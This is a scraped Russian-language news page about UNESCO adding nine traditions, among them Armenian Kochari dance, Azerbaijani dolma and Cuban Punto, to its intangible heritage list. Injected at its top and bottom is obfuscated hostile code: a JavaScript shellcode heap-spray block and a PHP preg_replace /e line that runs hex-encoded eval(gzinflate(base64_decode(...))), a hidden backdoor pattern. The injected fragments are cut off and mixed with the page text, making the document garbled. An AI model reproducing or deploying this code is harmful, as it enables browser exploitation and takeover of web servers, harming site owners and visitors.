%3cscript> var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); var spray = unescape("%u0a0a%u0a0a"); Девять элементов включены в Репрезентативный список нематериального культурного наследия человечества
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
Европейская правда

Девять элементов включены в Репрезентативный список нематериального культурного наследия человечества

Девять элементов включены в Репрезентативный список нематериального культурного наследия человечества
Девять элементов включены в Репрезентативный список нематериального культурного наследия человечества
Армения - Кочари, традиционный групповой танец

Чеджу (Республика Корея), 6 декабря – Сегодня Межправительственный комитет по охране нематериального культурного наследия, заседание которого проходит в Чеджу до 9 декабря, включил в Репрезентативный список нематериального культурного наследия человечества девять новых элементов.

Репрезентативный список нематериального культурного наследия человечества включает формы выражения, свидетельствующие о разнообразии нематериального наследия и повышающие осведомленность о его важности.

Процесс рассмотрения кандидатур на включение в Список продолжится завтра.

Названия новых включенных элементов представлены ниже (в хронологическом порядке включения в список) со ссылками на веб-страницы с информацией, изображениями и видео-материалами:

Саудовская Аравия - Аль-Катт аль-Асири, традиционная роспись стен женщинами в Асири (Саудовская Аравия)

Аль-Катт аль-Асири, традиционная роспись стен женщинами – это искусство, практикуемое женщинами общины, которое включает украшение внутренних стен, в частности, комнат для гостей. В настоящее время художники-мужчины и художники-женщины, дизайнеры и архитекторы также практикуют данную традицию росписи. Этот вид искусства укрепляет социальные связи и солидарность внутри женской общины. Традиция поддерживается в большинстве домашних хозяйств, что обеспечивает её жизнеспособность. Наблюдение и практика являются ключевыми методами передачи знаний и навыков, связанных с этой традицией.

Армения - Кочари, традиционный групповой танец

Кочари – это традиционный танец, который исполняют повсюду во время досуга, праздников и семейных торжеств. Танец открыт для всех, а его исполнение укрепляет чувство групповой самобытности, солидарности и взаимоуважения. Кочари передается как из поколения в поколение в семьях, так и через образовательные программы в молодежных художественных центрах, обычные занятия танцами и институциональные инициативы. Опытные танцоры играют ключевую роль в сохранении танца Кочари и обеспечении его жизнеспособности.

Азербайджан - культура приготовления и разделения долмы как маркера культурной идентичности

Традиция включает приготовление традиционного блюда «долма», которое представляет небольшое количество начинки из фарша, завернутой в свежие или предварительно обработанные листья, или из фруктов и овощей. Блюдо подается по особым случаям, когда собираются семьи и местные общины. Данная традиция воплощает дух солидарности, уважения и гостеприимства. Общины активно участвуют в сохранении её жизнеспособности посредством информационно-просветительской деятельности. Традиция передается, главным образом, в семьях, профессиональных училищах и специализированных школах.

Бангладеш - Традиционное искусство плетения шитал пати из Силхета

Шитал пати - традиционное искусство изготовления ковриков ручной работы путем переплетения полосок зеленого тростника, известного как «Мурта». Коврики используются по всему Бангладеш для сидения, молитв, а также в качестве покрывала. Искусство Шитал пати является основным источником средств к существованию, укрепляющим семейные узы и расширяющим права и возможности сообществ. Ремесло обычно передается по наследству из поколения в поколение. Более того, сообщества, практикующие искусство шитал пати, все чаще объединяются в кооперативы с целью обеспечения эффективного сохранения и передачи этого ремесла.

Боливия (Многонациональное Государство) -  Ритуальные процессии в Ла-Пас во время праздника Аласиты

В ходе ритуальных процессий в Ла-Пас во время праздника Аласиты участники приобретают приносящие удачу миниатюрные фигурки Экеко, великодушного бога плодородия. Фигурки впоследствии освящаются андскими ритуалистами или представителями католической церкви. Традиция способствует социальной сплоченности и передаче из поколения в поколение. Ритуалы праздника Аласиты передаются главным образом в семье, а также благодаря неустанным усилиям со стороны гражданского общества по сохранению данной традиции. В свою очередь, музейные выставки повышают осведомленность об этой практике, а муниципальные конкурсы способствуют производству миниатюрных фигурок.

Босния и Герцеговина - Резьба по дереву в Коньице

Резьба по дереву в Коньице - это художественный промысел, связанный с давней традицией муниципалитета Кониц. Изделия из дерева, включающие мебель, изысканные предметы интерьера и небольшие декоративные изделия, отличаются своими узнаваемыми узорами ручной резьбы и общими внешними признаками. Данное ремесло является важным элементом культурной самобытности местного сообщества, формирующей чувство общности и принадлежности. Традиция передается, главным образом, из поколения в поколение в семьях, а также путем практического обучения в семейных деревообрабатывающих мастерских, которые готовят начинающих резчиков по дереву и способствуют популяризации данного ремесла.

Болгария; бывшая югославская Республика Македония; Республика Молдова; Румыния - культурные традиции, связанные с 1 марта

Приуроченные к первому марта культурные обычаи знаменуют начало весны. Главный из них заключается в ношении амулетов из нитей красного и белого цветов, символизирующих безопасный и гармоничный переход от зимы к весне. Этот обычай соблюдают все члены соответствующих сообществ, он способствует социальной сплоченности, взаимодействию с природой, обмену между разными поколениями и творчеству. Традиция передается через неформальное обучение в семьях, среди соседей и в мастерских, а также в рамках специализированных школьных и музейных программ.

Кот-д'Ивуар - Заули, популярная музыка и танец народа гуро в Кот-д'Ивуаре

Заули - популярная музыка и танец, исполняемые народом гуро в Кот-д'Ивуаре. Традиция отдает дань женской красоте и вдохновлена двумя масками: Блу и Джела. Заули сочетает скульптуру, ткачество, музыку и танцы. Традиция передает культурную самобытность её исполнителей, а также способствует социальной сплоченности и охране окружающей среды. Передача искусства Заули происходит во время музыкальных выступлений и учебных занятий.  Жизнеспособность практики обеспечивается, в частности, благодаря регулярным выступлениям, организованным общинами, а также посредством танцевальных конкурсов и фестивалей, проводимых между поселениями.

Куба - Пунто

Пунто - это поэзия и музыка кубинских крестьян. Пунто состоит из напева или мелодии, на которую накладывается импровизированная или заученная рифмованная строфа. Пунто является важным элементом кубинского культурного наследия, способствующим диалогу и выражающим самобытность соответствующих общин. Знания и навыки передаются, в основном, путем имитации и в рамках учебной программы, включающей занятия с исполнителями-практиками Пунто в Домах культуры по всей стране.



Передает ЮНЕСКО

Европейская правда

Просмотров: 155
  •    

Мы в социальных сетях:    Twitter    FaceBook    Google+

Другие новости по теме:

Добавить комментарий








Информация

Комментировать статьи на нашем сайте возможно только в течении 40 дней со дня публикации.

При полном или частичном воспроизведении материалов прямая гиперссылка на сайт www.europravda.com.ua обязательна. Редакция не всегда разделяет мнения публикуемых материалов и не несет ответственности за достоверность и правдивость размещенной информации взятой с открытых источников. В случае необходимости использования текстовых, фото, графических, информационно-графических, видео, аудио и иных размещенных материалов, права на которые принадлежат третьим лицам, необходимо обращаться непосредственно к правообладателям. Если Вы являетесь автором материала или обладателем авторских прав на него и против его использования на сайте europravda.com.ua, пожалуйста свяжитесь с нами. Сайт не рекомендуется для чтения лицам младше + 18 лет. Редакция сайта открыта для сотрудничества, новых идей и предложений. Для связи с нами, пожалуйста используйте форму обратной связи.
<рhp preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/